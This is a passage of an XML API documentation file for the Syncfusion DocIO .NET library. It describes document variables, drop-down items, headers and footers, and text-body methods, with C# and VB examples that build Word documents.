            Updates the variables.
            </summary>
            <param name="variables">The variables.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.ToByteArray">
            <summary>
            Converts collection of variables to byte array.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.FindItem(System.Int32,System.Boolean)">
            <summary>
            Finds the item.
            </summary>
            <param name="index">The index.</param>
            <param name="returnName">if returns name, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocVariables.CheckIndex(System.Int32)">
            <summary>
            Checks the index.
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocVariables.Item(System.String)">
            <summary>
            Gets or sets the variable with the specified name.
            </summary>
            <param name="name">The <b>string</b> that specifies the name of the variable.</param>
            <value>The <b>string</b> that represents the variable name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocVariables.Count">
            <summary>
            Gets the count of variables.
            </summary>
            <value>The <b>integer</b> that specifies the variables count.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocVariables.Items">
            <summary>
            Gets the collection of name/value items.
            </summary>
            <value>The items.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WDropDownItem">
            <summary>
            Represents the item of drop down formfield.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WDropDownItem.m_text">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownItem.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WDropDownItem"/> class.
            </summary>
            <param name="doc">The document</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownItem.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownItem.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownItem.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WDropDownItem.Text">
            <summary>
            Gets / sets current DropDownItem text
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WHeadersFooters">
            <summary>
            Represents page headers and footers
            </summary>
            <example>
            <para>The following code example demonstrates how to add text to different types of headers and footers.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                	//Creates a new document.
                	WordDocument document = new WordDocument();
                	//Adds the first section to the document.
                	IWSection section = document.AddSection();
                	//Adds a paragraph to the section.
                	IWParagraph paragraph = section.AddParagraph();
                	//Sets DifferentFirstPage and DifferentOddEvenPages to true for inserting Header and Footer text.
                	section.PageSetup.DifferentFirstPage = true;
                	section.PageSetup.DifferentOddAndEvenPages = true;
                	//Appends some text to the first page in document.
                	paragraph.AppendText("\r\r[ First Page ] \r\rText Body_Text Body_Text Body_Text Body_Text Body_Text Body");
                	paragraph.ParagraphFormat.PageBreakAfter = true;
                	//Appends some text to the second page in document.
                	paragraph = section.AddParagraph();
                	paragraph.AppendText("\r\r[ Second Page ] \r\rText Body_Text Body_Text Body_Text Body_Text Body_Text Body");
                	paragraph.ParagraphFormat.PageBreakAfter = true;
                	//Appends some text to the third page in document.
                	paragraph = section.AddParagraph();
                	paragraph.AppendText("\r\r[ Third Page ] \r\rText Body_Text Body_Text Body_Text Body_Text Body_Text Body");
                	//Inserts First Page Header.
                	paragraph = new WParagraph(document);
                	paragraph.AppendText("[ FIRST PAGE Header ]");
                	section.HeadersFooters.FirstPageHeader.Paragraphs.Add(paragraph);
                	//Inserts First Page Footer.
                	paragraph = new WParagraph(document);
                	paragraph.AppendText("[ FIRST PAGE Footer ]");
                	section.HeadersFooters.FirstPageFooter.Paragraphs.Add(paragraph);
                	//Inserts Odd Pages Header.
                	paragraph = new WParagraph(document);
                	paragraph.AppendText("[ ODD Page Header Text goes here ]");
                	section.HeadersFooters.OddHeader.Paragraphs.Add(paragraph);
                	//Inserts Odd Pages Footer.
                	paragraph = new WParagraph(document);
                	paragraph.AppendText("[ ODD Page Footer Text goes here ]");
                	section.HeadersFooters.OddFooter.Paragraphs.Add(paragraph);
                	//Inserts Even Pages Header.
                	paragraph = new WParagraph(document);
                	paragraph.AppendText("[ EVEN Page Header Text goes here ]");
                	section.HeadersFooters.EvenHeader.Paragraphs.Add(paragraph);
                	//Inserts Even Pages Footer.
                	paragraph = new WParagraph(document);
                	paragraph.AppendText("[ EVEN Page Footer Text goes here ]");
                	section.HeadersFooters.EvenFooter.Paragraphs.Add(paragraph);
                	//Adds the second section to the document.
                	section = document.AddSection();
                	section.PageSetup.DifferentFirstPage = true;
                	//Appends some text to the Second Sections's first page in the document.
                	paragraph = section.AddParagraph();
                 paragraph.AppendText("\r\r[ First Page for SECOND SECTION ]\r[ ON DIFFERENT FIRTS PAGE ]\r\rText Body_Text Body_Text Body_Text Body_Text Body_Text Body");
                 paragraph.ParagraphFormat.PageBreakAfter = true;
                 //Appends some text to the Second Sections's second page in the document.
                 paragraph = section.AddParagraph();
                 paragraph.AppendText("\r\r[ Second Page for SECOND SECTION ]\rText Body_Text Body_Text Body_Text Body_Text Body_Text Body");
                 //Inserts Second Sections's First Header.
                 paragraph = new WParagraph(document);
                 paragraph.AppendText("[ SECOND SECTION FIRST PAGE Header ]");
                 section.HeadersFooters.FirstPageHeader.Paragraphs.Add(paragraph);
                 //Inserts Second Sections's First Footer.
                 paragraph = new WParagraph(document);
                 paragraph.AppendText("[ SECOND SECTION FIRST PAGE Footer ]");
                 section.HeadersFooters.FirstPageFooter.Paragraphs.Add(paragraph);
                 //Inserts Second Sections's Header.
                 paragraph = new WParagraph(document);
                 paragraph.AppendText("SECOND SECTION Header Text goes here");
                 section.HeadersFooters.OddHeader.Paragraphs.Add(paragraph);
                 //Inserts Second Sections's Footer.
                 paragraph = new WParagraph(document);
                 paragraph.AppendText("SECOND SECTION Footer Text goes here");
                 section.HeadersFooters.OddFooter.Paragraphs.Add(paragraph);
                 //Saves the document to disk.
                	document.Save("Sample.docx", FormatType.Docx);
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Creates a new document.
                Dim document As WordDocument = New WordDocument()
                'Adds the first section to the document.
                Dim section As IWSection = document.AddSection()
                'Adds a paragraph to the section.
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Sets DifferentFirstPage and DifferentOddEvenPages as true for inserting Header and Footer text.
                section.PageSetup.DifferentFirstPage = True
                section.PageSetup.DifferentOddAndEvenPages = True
                'Appends some text to the first page in document.
                paragraph.AppendText(Constants.VB.NETCr + Constants.VB.NETCr and "[ First Page ] " and Constants.VB.NETCr + Constants.VB.NETCr and "Text Body_Text Body_Text Body_Text Body_Text Body_Text Body")
                paragraph.ParagraphFormat.PageBreakAfter = True
                'Appends some text to the second page in document.
                paragraph = section.AddParagraph()
                paragraph.AppendText(Constants.VB.NETCr + Constants.VB.NETCr and "[ Second Page ] " and Constants.VB.NETCr + Constants.VB.NETCr and "Text Body_Text Body_Text Body_Text Body_Text Body_Text Body")
                paragraph.ParagraphFormat.PageBreakAfter = True
                'Appends some text to the third page in document.
                paragraph = section.AddParagraph()
                paragraph.AppendText(Constants.VB.NETCr + Constants.VB.NETCr and "[ Third Page ] " and Constants.VB.NETCr + Constants.VB.NETCr and "Text Body_Text Body_Text Body_Text Body_Text Body_Text Body")
                'Inserts First Page Header.
                paragraph = New WParagraph(document)
                paragraph.AppendText("[ FIRST PAGE Header ]")
                section.HeadersFooters.FirstPageHeader.Paragraphs.Add(paragraph)
                'Inserts First Page Footer.
                paragraph = New WParagraph(document)
                paragraph.AppendText("[ FIRST PAGE Footer ]")
                section.HeadersFooters.FirstPageFooter.Paragraphs.Add(paragraph)
                'Inserts Odd Pages Header.
                paragraph = New WParagraph(document)
                paragraph.AppendText("[ ODD Page Header Text goes here ]")
                section.HeadersFooters.OddHeader.Paragraphs.Add(paragraph)
                'Inserts Odd Pages Footer.
                paragraph = New WParagraph(document)
                paragraph.AppendText("[ ODD Page Footer Text goes here ]")
                section.HeadersFooters.OddFooter.Paragraphs.Add(paragraph)
                'Inserts Even Pages Header.
                paragraph = New WParagraph(document)
                paragraph.AppendText("[ EVEN Page Header Text goes here ]")
                section.HeadersFooters.EvenHeader.Paragraphs.Add(paragraph)
                'Inserts Even Pages Footer.
                paragraph = New WParagraph(document)
                paragraph.AppendText("[ EVEN Page Footer Text goes here ]")
                section.HeadersFooters.EvenFooter.Paragraphs.Add(paragraph)
                'Adds the second section to the document.
                section = document.AddSection()
                section.PageSetup.DifferentFirstPage = True
                'Appends some text to the Second Sections's first page in the document.
                paragraph = section.AddParagraph()
                paragraph.AppendText(Constants.VB.NETCr + Constants.VB.NETCr and "[ First Page for SECOND SECTION ]" and Constants.VB.NETCr and "[ ON DIFFERENT FIRTS PAGE ]" and Constants.VB.NETCr + Constants.VB.NETCr and "Text Body_Text Body_Text Body_Text Body_Text Body_Text Body")
                paragraph.ParagraphFormat.PageBreakAfter = True
                'Appends some text to the Second Sections's second page in the document.
                paragraph = section.AddParagraph()
                paragraph.AppendText(Constants.VB.NETCr + Constants.VB.NETCr and "[ Second Page for SECOND SECTION ]" and Constants.VB.NETCr and "Text Body_Text Body_Text Body_Text Body_Text Body_Text Body")
                'Inserts Second Sections's First Header.
                paragraph = New WParagraph(document)
                paragraph.AppendText("[ SECOND SECTION FIRST PAGE Header ]")
                section.HeadersFooters.FirstPageHeader.Paragraphs.Add(paragraph)
                'Inserts Second Sections's First Footer.
                paragraph = New WParagraph(document)
                paragraph.AppendText("[ SECOND SECTION FIRST PAGE Footer ]")
                section.HeadersFooters.FirstPageFooter.Paragraphs.Add(paragraph)
                'Inserts Second Sections's Header.
                paragraph = New WParagraph(document)
                paragraph.AppendText("SECOND SECTION Header Text goes here")
                section.HeadersFooters.OddHeader.Paragraphs.Add(paragraph)
                'Inserts Second Sections's Footer.
                paragraph = New WParagraph(document)
                paragraph.AppendText("SECOND SECTION Footer Text goes here")
                section.HeadersFooters.OddFooter.Paragraphs.Add(paragraph)
                'Saves the document to disk.
                document.Save("Sample.docx", FormatType.Docx)
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WHeadersFooters.m_evenHeader">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.#ctor(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Creates HeadersFooters object for specified document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.GetEnumerator">
            <summary>
            Returns an enumerator that iterates through a collection.
            </summary>
            <returns>
            An <see cref="T:System.Collections.IEnumerator"></see> object that can be used to iterate through the collection.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.GetLinkToPrevious">
            <summary>
            Gets the link to previous.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.UpdateLinkToPrevious(System.Boolean)">
            <summary>
            Updates the link to previous.
            </summary>
            <param name="linkToPrevious">if it links to previous header/footer, set to <c>true</c>.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.Header">
            <summary>
            Gets default header of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HeaderFooter"/> instance that represents the default header for the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.Footer">
            <summary>
            Gets default footer of the document. Read-only.
            </summary>
            <value> the <see cref="T:Syncfusion.DocIO.DLS.HeaderFooter"/> instance that represents the default footer for the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.EvenHeader">
            <summary>
            Gets even pages header of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HeaderFooter"/> instance that represents the even pages header for the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.OddHeader">
            <summary>
            Gets odd pages header of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HeaderFooter"/> instance that represents the odd pages header for the document.</value>
            <remarks> This is also the default header for the document</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.EvenFooter">
            <summary>
            Gets even pages footer of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HeaderFooter"/> instance that represents the even pages footer for the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.OddFooter">
            <summary>
            Gets odd pages footer of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HeaderFooter"/> instance that represents the odd pages footer for the document.</value>
            <remarks>This is also the default footer for the document.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.FirstPageHeader">
            <summary>
            Gets first page header of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HeaderFooter"/> instance that represents the first page header for the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.FirstPageFooter">
            <summary>
            Gets first page footer of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HeaderFooter"/> instance that represents the first page footer for the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.IsEmpty">
            <summary>
            Gets a value indicating whether all the headers/footers are empty.
            </summary>
            <value>
            <b>True</b> if the document has empty headers/footers; otherwise, <b>false</b>.
            </value> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.Item(System.Int32)">
            <summary>
            Gets TextBody of the header/footer of the document at specified index.
            </summary>
            <value>The integer that represents the <see cref="T:Syncfusion.DocIO.DLS.HeaderFooterType"/></value>
            <remarks>
            <para>The HeaderFooterType has 6 values which is used as index for this property.</para>
            <para>Index 0 - EvenHeader</para>
            <para>Index 1 - OddHeader</para>
            <para>Index 2 - EvenFooter</para>
            <para>Index 3 - OddFooter</para>
            <para>Index 4 - FirstPageHeader</para>
            <para>Index 5 - FirstPageFooter</para>
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.Item(Syncfusion.DocIO.DLS.HeaderFooterType)">
            <summary>
            Gets TextBody of the header/footer of the document by specified HeaderFooter type.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.LinkToPrevious">
            <summary>
            Gets or sets a value indicating whether the current header or footer is linked to the header or footer in the previous section.
            </summary>
            <value><b>True</b> if the current header or footer is linked to the header or footer in the previous section, otherwise <b>false</b>.</value>
            <remarks>This property always returns false for the first section, since there is no previous section for the first section.</remarks>
            <example>
            <para>The following code example demonstrates how to link the previous section header and footer for the current section.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new document
                WordDocument document = new WordDocument();
                //Add the first section to the document
                IWSection section = document.AddSection();
                //Insert the first section header
                section.HeadersFooters.Header.AddParagraph().AppendText("[ First Section Header ]");
                //Insert the first section footer
                section.HeadersFooters.Footer.AddParagraph().AppendText("[ First Section Footer ]");
                //Add a paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Append some text to the first page in document
                paragraph.AppendText("\r\r[ First Page ] \r\r" + paraText);
                //Add the second section to the document
                section = document.AddSection();
                //Insert the second section header
                section.HeadersFooters.Header.AddParagraph().AppendText("[ Second Section Header ]");
                //Insert the second section footer.
                section.HeadersFooters.Footer.AddParagraph().AppendText("[ Second Section Footer ]");
                //Set LinkToPrevious as true for retrieve the header and footer from previous section
                section.HeadersFooters.LinkToPrevious = true;
                //Append some text to the second page in document
                paragraph = section.AddParagraph();
                paragraph.AppendText("\r\r[ Second Page ] \r\r" + paraText);
                //Add the third section to the document
                section = document.AddSection();
                //Insert the third section header
                section.HeadersFooters.Header.AddParagraph().AppendText("[ Third Section Header ]");
                //Insert the third section footer
                section.HeadersFooters.Footer.AddParagraph().AppendText("[ Third Section Footer ]");
                //Append some text to the third page in document
                paragraph = section.AddParagraph();
                paragraph.AppendText("\r\r[ Third Page ] \r\r" + paraText);
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new document
                Dim document As New WordDocument()
                'Add the first section to the document
                Dim section As IWSection = document.AddSection()
                'Insert the first section header
                section.HeadersFooters.Header.AddParagraph().AppendText("[ First Section Header ]")
                'Insert the first section footer
                section.HeadersFooters.Footer.AddParagraph().AppendText("[ First Section Footer ]")
                'Add a paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Append some text to the first page in document
                paragraph.AppendText(Convert.ToString(vbCr &amp; vbCr &amp; "[ First Page ] " &amp; vbCr &amp; vbCr) &amp; paraText)
                'Add the second section to the document
                section = document.AddSection()
                'Insert the second section header
                section.HeadersFooters.Header.AddParagraph().AppendText("[ Second Section Header ]")
                'Insert the second section footer
                section.HeadersFooters.Footer.AddParagraph().AppendText("[ Second Section Footer ]")
                'Set LinkToPrevious as true for retrieve the header and footer from previous section
                section.HeadersFooters.LinkToPrevious = True
                'Append some text to the second page in document
                paragraph = section.AddParagraph()
                paragraph.AppendText(Convert.ToString(vbCr &amp; vbCr &amp; "[ Second Page ] " &amp; vbCr &amp; vbCr) &amp; paraText)
                'Add the third section to the document
                section = document.AddSection()
                'Insert the third section header
                section.HeadersFooters.Header.AddParagraph().AppendText("[ Third Section Header ]")
                'Insert the third section footer
                section.HeadersFooters.Footer.AddParagraph().AppendText("[ Third Section Footer ]")
                'Append some text to the third page in document
                paragraph = section.AddParagraph()
                paragraph.AppendText(Convert.ToString(vbCr &amp; vbCr &amp; "[ Third Page ] " &amp; vbCr &amp; vbCr) &amp; paraText)
                �Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WHeadersFooters.HFEnumerator">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.HFEnumerator.#ctor(Syncfusion.DocIO.DLS.WHeadersFooters)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WHeadersFooters.HFEnumerator"/> class.
            </summary>
            <param name="hfs">The HFS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.HFEnumerator.MoveNext">
            <summary>
            Advances the enumerator to the next element of the collection.
            </summary>
            <returns>
            true if the enumerator was successfully advanced to the next element; false if the enumerator has passed the end of the collection.
            </returns>
            <exception cref="T:System.InvalidOperationException">The collection was modified after the enumerator was created. </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WHeadersFooters.HFEnumerator.Reset">
            <summary>
            Sets the enumerator to its initial position, which is before the first element in the collection.
            </summary>
            <exception cref="T:System.InvalidOperationException">The collection was modified after the enumerator was created. </exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WHeadersFooters.HFEnumerator.Current">
            <summary>
            Gets the current element in the collection.
            </summary>
            <value></value>
            <returns>The current element in the collection.</returns>
            <exception cref="T:System.InvalidOperationException">The enumerator is positioned before the first element of the collection or after the last element. </exception>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HeaderFooter">
            <summary>
            Represents the page header or footer.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTextBody">
            <summary>
            Represent a text body of the Word document.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WidgetContainer">
            <summary>
            The base implementation of IWidgetContainer interface
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.IWidgetContainer">
            <summary>
            Represents a collection of Widget objects.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.IWidgetContainer.Count">
            <summary>
            Gets count of child widgets.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.IWidgetContainer.Item(System.Int32)">
            <summary>
            Gets child widget by index.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.IWidgetContainer.WidgetInnerCollection">
            <summary>
            Gets ChildWidgets collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WidgetContainer.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WidgetContainer"/> class.
            </summary>
            <param name="doc">The document.</param>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WidgetContainer.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WidgetContainer.Count">
            <summary>
            Gets count of child widgets.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WidgetContainer.Syncfusion#Layouting#IWidgetContainer#Item(System.Int32)">
            <summary>
            Gets child widget by index.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WidgetContainer.WidgetCollection">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WidgetContainer.WidgetInnerCollection">
            <summary>
            Gets Childwidgets. Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ITextBody">
            <summary>
            Represents the text body 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ICompositeEntity">
            <summary>
            Represents the entity collection
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ICompositeEntity.ChildEntities">
            <summary>
            Gets the child entities.
            </summary>
            <value>The child entities.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBody.AddParagraph">
            <summary>
            Adds a new paragraph at the end of section.
            </summary>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> object.</returns>
            <example>The following example illustrates how to add a paragraph to the text body.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create new Word document
                WordDocument document = new WordDocument();
                //Add new section
                IWSection section = document.AddSection();
                WTextBody textbody = section.Body;
                //Add a paragraph to the text body
                WParagraph paragraph = textbody.AddParagraph() as WParagraph;
                //Add text
                paragraph.AppendText("A new paragraph is added");
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create new Word document
                Dim document As New WordDocument()
                'Add new section
                Dim section As IWSection = document.AddSection()
                Dim textbody As WTextBody = section.Body
                'Add a paragraph to the text body
                Dim paragraph As WParagraph = TryCast(textbody.AddParagraph(), WParagraph)
                'Add text
                paragraph.AppendText("A new paragraph is added")
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBody.AddTable">
            <summary>
            Adds a new table at the end of the section.
            </summary>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> object.</returns>
            <example>The following example illustrates how to add a table to the text body.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create new Word document
                WordDocument document = new WordDocument();
                //Add new section
                IWSection section = document.AddSection();
                WTextBody textbody = section.Body;
                //Add a table to the text body
                IWTable table = textbody.AddTable();
                table.ResetCells(2, 2);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create new Word document
                Dim document As New WordDocument()
                'Add new section
                Dim section As IWSection = document.AddSection()
                Dim textbody As WTextBody = section.Body
                'Add a table to the text body
                Dim table As IWTable = textbody.AddTable()
                table.ResetCells(2, 2)
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBody.InsertXHTML(System.String)">
            <summary>
            Inserts the specified html string at end of the text body.
            </summary>
            <param name="html">The html string to be added to the text body.</param>
            <remarks>This method is not supported in Silverlight, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example>The following example illustrates how to insert a html string to the text body.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                //Append Html string as first item of the second paragraph in the document
                document.Sections[0].Body.InsertXHTML(htmlstring);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                'Append Html string as first item of the second paragraph in the document
                document.Sections(0).Body.InsertXHTML(htmlstring)
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBody.InsertXHTML(System.String,System.Int32)">
            <summary>
            Inserts the specified html string at the specified paragraph index.
            </summary>
            <param name="html">The html string to be added to the text body.</param>
            <param name="paragraphIndex">The zero-based index of the paragraph to insert the html string.</param>
            <remarks>This method is not supported in Silverlight, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example>The following example illustrates how to insert a html string at the specified paragraph in the text body.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                //Append Html string as first item of the second paragraph in the document
                document.Sections[0].Body.InsertXHTML(htmlstring, 2);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                'Append Html string as first item of the second paragraph in the document
                document.Sections(0).Body.InsertXHTML(htmlstring, 2)
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBody.InsertXHTML(System.String,System.Int32,System.Int32)">
            <summary>
            Inserts the specified html string at the paragraph specified by paragraphIndex, 
            and at paragraph item index specified by paragraphItemIndex.
            </summary>The following example illustrates how to insert a html string to the paragraph at specified paragraph item index.
            <param name="html">The html string to be added to the text body.</param>
            <param name="paragraphIndex">The zero-based index of the paragraph to insert the html string.</param>
            <param name="paragraphItemIndex">The zero-based index of the paragraph item to insert the html string.</param> 
            <remarks>This method is not supported in Silverlight, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                //Append Html string as first item of the second paragraph in the document
                document.Sections[0].Body.InsertXHTML(htmlstring, 2, 0);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                'Append Html string as first item of the second paragraph in the document
                document.Sections(0).Body.InsertXHTML(htmlstring, 2, 0)
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
